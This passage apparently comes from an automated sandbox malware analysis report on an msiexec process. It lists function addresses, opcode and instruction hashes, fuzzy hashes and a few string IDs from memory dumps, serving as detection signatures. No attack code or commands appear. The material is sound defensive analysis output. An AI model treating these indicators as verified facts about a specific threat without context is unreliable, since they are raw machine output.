                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Hnq
                                                                              • API String ID: 0-2896580000
                                                                              • Opcode ID: 9cf29bc16e1146a85af32c3479d430368a4f22d35bc7d2d3c7b3677181b74bbc
                                                                              • Instruction ID: b565cfbac71ef4748d34f22a5c8fa972fbdd8df9e0528e6177a2086820a9414c
                                                                              • Opcode Fuzzy Hash: 9cf29bc16e1146a85af32c3479d430368a4f22d35bc7d2d3c7b3677181b74bbc
                                                                              • Instruction Fuzzy Hash: 31318071B002099FCB54DBB8D855AAE7FB6AFD9211F1080BEE509D7256DE348902C790
                                                                              Function 005BE018 Relevance: .6, Instructions: 647COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b5108d26d4e7dcf50bb201a4f0eca42b5227529bc0c611075894d901631f34b
                                                                              • Instruction ID: c389475e78a40cb13160b38aa530a4cadde635b2d17b9df9639ba9e173b4b2c3
                                                                              • Opcode Fuzzy Hash: 9b5108d26d4e7dcf50bb201a4f0eca42b5227529bc0c611075894d901631f34b
                                                                              • Instruction Fuzzy Hash: 4912A47C0A16879FE6512B34D6BC16ABEA1FB5F363720AC00E51BD5045EB3D048A9B62
                                                                              Function 005B57C0 Relevance: .3, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 26bab87f251cbd814e32bed97f51d6ec9fc8f401fcff216246ee51bc589299ac
                                                                              • Instruction ID: d0143811eef1a190dbcce3ecf216bd52ed766575e49ce73f0ad724bc6a598ed2
                                                                              • Opcode Fuzzy Hash: 26bab87f251cbd814e32bed97f51d6ec9fc8f401fcff216246ee51bc589299ac
                                                                              • Instruction Fuzzy Hash: 1AB12D78280314DFD706AB65D65BB153FABFB8C310F204E18AD01137AD8A7D6899DE1A
                                                                              Function 005B60A0 Relevance: .2, Instructions: 206COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 22652526159776aca94954f8d0ee9ef427e31da1434b867af154a2270c6e2456
                                                                              • Instruction ID: 9cb0df8ad11d6f5a52c856bf1d37e39da03a234fc683d015a1166c7928b00a77
                                                                              • Opcode Fuzzy Hash: 22652526159776aca94954f8d0ee9ef427e31da1434b867af154a2270c6e2456
                                                                              • Instruction Fuzzy Hash: FA61D1347042118FDB159B3988687BABFA6BFC4351F148529D506CB3A5DF39EC42D781
                                                                              Function 005B40F1 Relevance: .2, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e5994d1cdf525caac218f79bd2091c911881a490d52a0e0349c8c5fc7628866e
                                                                              • Instruction ID: 6046052d98add5c93477b4ea5a0ad5dcafdf10e7ecfb24609aad8c1b54b0ffa5
                                                                              • Opcode Fuzzy Hash: e5994d1cdf525caac218f79bd2091c911881a490d52a0e0349c8c5fc7628866e
                                                                              • Instruction Fuzzy Hash: A3815A74E44348CFCB05DFA8D8948DDBBB2FF89310B24856AD805AB366D739A846CF51
                                                                              Function 005B41A0 Relevance: .1, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 060bab64effa25cb4d7ac09eaadf08280ee8208b6f8d7356fd3d64f6bd154e2e
                                                                              • Instruction ID: c0cf784896408bb9798ffb40811985723972db92854830a63be30fc1c3ea213e
                                                                              • Opcode Fuzzy Hash: 060bab64effa25cb4d7ac09eaadf08280ee8208b6f8d7356fd3d64f6bd154e2e
                                                                              • Instruction Fuzzy Hash: 4A51B578E01318CFCB08DFA9D58599DBBF2FF89300B209569E805AB369DB35A845CF50
                                                                              Function 24970C01 Relevance: .1, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4aafa3ea37178e9ae1a80355a1450614583748011776857f832ef802e9eec746
                                                                              • Instruction ID: 385989a289681c3c03cb47be785a0928c921859eeaca631b145d07165361045e
                                                                              • Opcode Fuzzy Hash: 4aafa3ea37178e9ae1a80355a1450614583748011776857f832ef802e9eec746
                                                                              • Instruction Fuzzy Hash: 1951ADB4E01228CFCB65DF64C988BDDBBB6BB89301F1055EAD409A7354D735AA85CF10
                                                                              Function 005B5658 Relevance: .1, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ebaaf0115a555219f9b8c9459827bbb857e0f5c230b287b5646f2cfcd34bff05
                                                                              • Instruction ID: 77b900d25bbfb66714fb5b86d4dd10c177935a2f0fa1f141337e54f4cc66e379
                                                                              • Opcode Fuzzy Hash: ebaaf0115a555219f9b8c9459827bbb857e0f5c230b287b5646f2cfcd34bff05
                                                                              • Instruction Fuzzy Hash: 8E318F3530510ADFCF199F64D898AAE3FA2FB88351F108424F91987254DB3ADD22EB91
                                                                              Function 2497FC5E Relevance: .1, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7ac301af64869f3846bcc258b8160be699f0e6093117141e7d256dfa7395ef44
                                                                              • Instruction ID: df11fd89930ffe625f2fb42bd0ea8b5d72cffa708c4b72f5756ab26eaf1ef2e1
                                                                              • Opcode Fuzzy Hash: 7ac301af64869f3846bcc258b8160be699f0e6093117141e7d256dfa7395ef44
                                                                              • Instruction Fuzzy Hash: EE31C2B4E00218CBDB18DFAAD8406DDBBF2BF89300F54D12AD819BB269DB345942CF54
                                                                              Function 24974B80 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: abaf62177981ec5e211710f6d69ff181d58c7ae8d59a6d89586ca88055d8295e
                                                                              • Instruction ID: 24012f61f5d8ae6378c2ed2b26e268a579e5a2f18b747528ca17b9329d421cc0
                                                                              • Opcode Fuzzy Hash: abaf62177981ec5e211710f6d69ff181d58c7ae8d59a6d89586ca88055d8295e
                                                                              • Instruction Fuzzy Hash: 5631CE75E01219DFCB45CF68C844A9EFBB1FF8A325B1481AAD419EB312E7319811CF80
                                                                              Function 005B28F0 Relevance: .1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c1eff4dd01b65723b0c400a6ad93e7bafcd2daaeae9669f32f5960479970e7b3
                                                                              • Instruction ID: d462641e5aa5a9c83af842f6f0be4e1599f0edbc652c1d539a212f8f91bb34d9
                                                                              • Opcode Fuzzy Hash: c1eff4dd01b65723b0c400a6ad93e7bafcd2daaeae9669f32f5960479970e7b3
                                                                              • Instruction Fuzzy Hash: DB218135A001199FCB15DF34C5419EE7BA5FB99360F108529D8199B258DB30EE82CBE1
                                                                              Function 005B62F8 Relevance: .1, Instructions: 75COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1c9cf390aa03da1e4a23329cc5cce07747bb880589243f8ca3d915445785c2ae
                                                                              • Instruction ID: 880745b53c78a6bbaf7b1bed587e4d941c9db80f61f94f22e2e0a2eefbd4959c
                                                                              • Opcode Fuzzy Hash: 1c9cf390aa03da1e4a23329cc5cce07747bb880589243f8ca3d915445785c2ae
                                                                              • Instruction Fuzzy Hash: D821F6393056118FC7255A29C46897EBBE2FFC97517248939E806CB394CF39EC028B80
                                                                              Function 0058D044 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267133011.000000000058D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0058D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_58d000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4519b1dcf4b5c7bcb230b191387231ed332ea45628e59df25e726882d14a6bf8
                                                                              • Instruction ID: abf44d3e980dc23eb2faf881f64420f2b29e9d41c057d5bb9202d33f2af76aa6
                                                                              • Opcode Fuzzy Hash: 4519b1dcf4b5c7bcb230b191387231ed332ea45628e59df25e726882d14a6bf8
                                                                              • Instruction Fuzzy Hash: 3F21D071604204EFCB14EF24C988B26BFB5FB84314F24C969ED495B292D73AD846DB72
                                                                              Function 005B5650 Relevance: .1, Instructions: 66COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c56d1434b9026ad6e02f6632944ecb21721641f970775f013551ae699e926d21
                                                                              • Instruction ID: 209aa2c9eaaf635989ceb3590970267e97504ebc714772fc7ab0b35c0096e846
                                                                              • Opcode Fuzzy Hash: c56d1434b9026ad6e02f6632944ecb21721641f970775f013551ae699e926d21
                                                                              • Instruction Fuzzy Hash: 4821AE31605509DFCF189F68D4897AE3BA2FB98351F108429F8098B244DB79DE51EBA0
                                                                              Function 005B6300 Relevance: .1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c4df47e0ee13624970096d9aef416eb7e53534e60f3ec7e9a9b56b1e5ec0a50a
                                                                              • Instruction ID: 5c376c005da383a9b2e34877f48d040c9f153e355a2cd162181d0358c64d07f9
                                                                              • Opcode Fuzzy Hash: c4df47e0ee13624970096d9aef416eb7e53534e60f3ec7e9a9b56b1e5ec0a50a
                                                                              • Instruction Fuzzy Hash: 511108353056119FC7295A2EC46897E7BE6FFC57A17184878E806CB360CF39EC028B90
                                                                              Function 005B27F7 Relevance: .1, Instructions: 55COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cdfc32b2de8de0bb4ff36ff8be404afe78bd356051a381f0ab9fa894f9bb1245
                                                                              • Instruction ID: 86c0e8839eaf203a89d64dbc3bfbae685201a64012ef5a0cd9194f55c22c8f23
                                                                              • Opcode Fuzzy Hash: cdfc32b2de8de0bb4ff36ff8be404afe78bd356051a381f0ab9fa894f9bb1245
                                                                              • Instruction Fuzzy Hash: 9C21CF78D0420A8FCB00DFA9C9456EEBFF4FF09310F10566AD819B2220EB345A95CFA1
                                                                              Function 005BF650 Relevance: .1, Instructions: 54COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3d56c13eda749571009c1d5b8f7915c39e8e5353d9a3ffe2724c41fc781a394
                                                                              • Instruction ID: cb2574338f9933b1ccf6762c4e81137b596e0eb46737ad5fb2383bb7554158f6
                                                                              • Opcode Fuzzy Hash: d3d56c13eda749571009c1d5b8f7915c39e8e5353d9a3ffe2724c41fc781a394
                                                                              • Instruction Fuzzy Hash: BA1184B0D001099FCB05DFA8D94568EBFF5FF40304F50C5A9C4089B269E7349A09DF81
                                                                              Function 005B5EA0 Relevance: .0, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e10967ee207c327377e9e312793d7f6d9d51aa842e3565330b249ff1e1014be8
                                                                              • Instruction ID: 88f2ef77ecb4bfac7ee0910e1e0b470336c795858f886dd14702ee10d0096cba
                                                                              • Opcode Fuzzy Hash: e10967ee207c327377e9e312793d7f6d9d51aa842e3565330b249ff1e1014be8
                                                                              • Instruction Fuzzy Hash: C201DF32740515AFCB25CE589814AFE3FABFBC87A0F148029F405C7284DE36DE16A790
                                                                              Function 24973258 Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 562fb2ddf87660ab69a76cc1890bebcf495decff2ee4dd2670d33b3369ce09aa
                                                                              • Instruction ID: 4f2da3829ff2e2207f17c4922da7e7d1e86c6be287d8e5f5e442044d571917ba
                                                                              • Opcode Fuzzy Hash: 562fb2ddf87660ab69a76cc1890bebcf495decff2ee4dd2670d33b3369ce09aa
                                                                              • Instruction Fuzzy Hash: 5A015E75E4021DAFCB549F78C8589AE7BB5FF89310F404479EE1A93240EB348911CBA1
                                                                              Function 24973248 Relevance: .0, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5598d92f9cf9f5415fa456578801fb4b9a1c70e1674b26101c292745af51fcdf
                                                                              • Instruction ID: 6a7695d1fba49d1288646a96e85b2777912c124dcdc267e7aef9b0ec57e92883
                                                                              • Opcode Fuzzy Hash: 5598d92f9cf9f5415fa456578801fb4b9a1c70e1674b26101c292745af51fcdf
                                                                              • Instruction Fuzzy Hash: 0001DFB2E40208EFCB14DFA8C8449EE7BB5FF88320B004079EA1993240DB308D51CFA1
                                                                              Function 249749EA Relevance: .0, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f6f0594213be3b6a24be5b73b0ffd5082bf1901bf2864b9b9d7bc865d446f86e
                                                                              • Instruction ID: 8a7c73f0e7005e5d44f7ecbabb400cc43be1ba49b86a0024d5e7b14e5191552b
                                                                              • Opcode Fuzzy Hash: f6f0594213be3b6a24be5b73b0ffd5082bf1901bf2864b9b9d7bc865d446f86e
                                                                              • Instruction Fuzzy Hash: 04F0AF3AB041649FCB095AB494184AE3FB6ABDA322B1540AAE60AC7391DA398C438754
                                                                              Function 249744CF Relevance: .0, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b092e75bd02ec2a4c71a938a897ff2ebf787326ed4df224348f859c973ff33e9
                                                                              • Instruction ID: 4dfa9fa02518ca548293e414118c368106f72d36168ec74c487486c90ac03dfb
                                                                              • Opcode Fuzzy Hash: b092e75bd02ec2a4c71a938a897ff2ebf787326ed4df224348f859c973ff33e9
                                                                              • Instruction Fuzzy Hash: 0DF06272E102099E8B50DFAAD841AAFFFF9FF88350705452AE905D3211D73059168BA1
                                                                              Function 24974990 Relevance: .0, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4586ddb833bcd9764b4cd20f37f7ac44567e18137db3ca5f85506abdddabf98
                                                                              • Instruction ID: 2e902bfc2d6cf0a67c03384667114a9c66e7f780552251ac44605cb1c244456b
                                                                              • Opcode Fuzzy Hash: a4586ddb833bcd9764b4cd20f37f7ac44567e18137db3ca5f85506abdddabf98
                                                                              • Instruction Fuzzy Hash: A8F03A353001059FC700CF6AC484C5ABBFAFF897207548069E60987332CB719C51CB80
                                                                              Function 005BAF64 Relevance: .0, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae12cda09b3510d1d1630c5759763ca95b42fb0fa1a391e0a3c1c48f8b926c3e
                                                                              • Instruction ID: 924e473038fcf28a08c53d097c25cdee61fe0583cc65dfd61461989c05226a12
                                                                              • Opcode Fuzzy Hash: ae12cda09b3510d1d1630c5759763ca95b42fb0fa1a391e0a3c1c48f8b926c3e
                                                                              • Instruction Fuzzy Hash: 9EE0C97A740104AFCB10CE84DC41FDDBBB2FB8C711F244156FA11A72A0C632A825DB50
                                                                              Function 005B28B0 Relevance: .0, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83dc0b8fa841e34ec2518a2aac650cf235479726a3b32d6b350f9331dc3594a0
                                                                              • Instruction ID: abe0d539bdd350f02f572a56405242d6caece130a91899ba2cdc6af8340b7287
                                                                              • Opcode Fuzzy Hash: 83dc0b8fa841e34ec2518a2aac650cf235479726a3b32d6b350f9331dc3594a0
                                                                              • Instruction Fuzzy Hash: DFD05B31D2022B57CB01E7A5DC044EFF738EED6261B544666D51437154FB702659C6E1
                                                                              Function 005B28AA Relevance: .0, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 78a2e7fd9c335879c3c8a60aef9d68213294d68b7ff9dc674aba007daa3ac4c8
                                                                              • Instruction ID: 8c3da5b71bbd39e7365ba6f6005acc74fef0b3912d7eeda7fced4fd02000942e
                                                                              • Opcode Fuzzy Hash: 78a2e7fd9c335879c3c8a60aef9d68213294d68b7ff9dc674aba007daa3ac4c8
                                                                              • Instruction Fuzzy Hash: 85E0C232D2062686CB01EBA0EC000EEB334EE82221B588627C92136151EB301669C7D1
                                                                              Function 24974A40 Relevance: .0, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1fb005aa1780d458aa068a10200d7809010eb874d2ef98cf67c53a6836493d2
                                                                              • Instruction ID: 30f8d98b6adfefad0d48e87160bfb8c0ca4cd7bb1bdcfa331a9d82bb026c1dc4
                                                                              • Opcode Fuzzy Hash: b1fb005aa1780d458aa068a10200d7809010eb874d2ef98cf67c53a6836493d2
                                                                              • Instruction Fuzzy Hash: D6D0C7367441286B4B151A49D4058AE7B7EDBC97717448066F90983300CE754D1197D5
                                                                              Function 005B6741 Relevance: .0, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fcd57497b82d476be1c19d2462b4b346fe281d4c0f4bbbbd25b7adf49b6610a
                                                                              • Instruction ID: 74ff1853168c58974383c45aa00a4ed6bff3f6691699d806ffa97347265b2d34
                                                                              • Opcode Fuzzy Hash: 5fcd57497b82d476be1c19d2462b4b346fe281d4c0f4bbbbd25b7adf49b6610a
                                                                              • Instruction Fuzzy Hash: 3AD05E314D03065FC705AF28E98A8683F6EFBC0322B10C724A5050955FDF79854A9B40
                                                                              Function 005BAFAD Relevance: .0, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 82d7f02203f53baf238d082bcff933dd5ae4a507889e150ac42d6e5120c57e1b
                                                                              • Instruction ID: 1674b37e9f1d943b93a826937c92489b49efa72696ec6e41a5520e751a979464
                                                                              • Opcode Fuzzy Hash: 82d7f02203f53baf238d082bcff933dd5ae4a507889e150ac42d6e5120c57e1b
                                                                              • Instruction Fuzzy Hash: 09D0677AB400189FCF15DF98E8508DDFB76FB98221B048117E915A3261C6319925DB50
                                                                              Function 24974284 Relevance: .0, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a8c57661ee46c344cc831266b125e0f06ee54c4bf93b5350a03693e4aef7544c
                                                                              • Instruction ID: 479ab635a201ecda22a8865cd77b18c833163f2eabd1902b334f1b82bd8fbfa5
                                                                              • Opcode Fuzzy Hash: a8c57661ee46c344cc831266b125e0f06ee54c4bf93b5350a03693e4aef7544c
                                                                              • Instruction Fuzzy Hash: 63D0C97A741110CFC314DB69E455C99BB75FF9922632855BFE202CB732C676C805CB20
                                                                              Function 005B6748 Relevance: .0, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a194125d128f651f11fb95dbdd789ee2fc1fc4ee4fd1205150fadbb01826368d
                                                                              • Instruction ID: 60c7776450451962d6ecd7d847a98a82dd0802eb9fbe80062b10c0167919a4a8
                                                                              • Opcode Fuzzy Hash: a194125d128f651f11fb95dbdd789ee2fc1fc4ee4fd1205150fadbb01826368d
                                                                              • Instruction Fuzzy Hash: DFC012300C03094FC605FB69ED4AD553B1EBAC0305B508A20A5090955DDF7C994D9790

                                                                              Non-executed Functions

                                                                              Function 005B7118 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (ojq$(ojq$(ojq$,nq$,nq
                                                                              • API String ID: 0-954490635
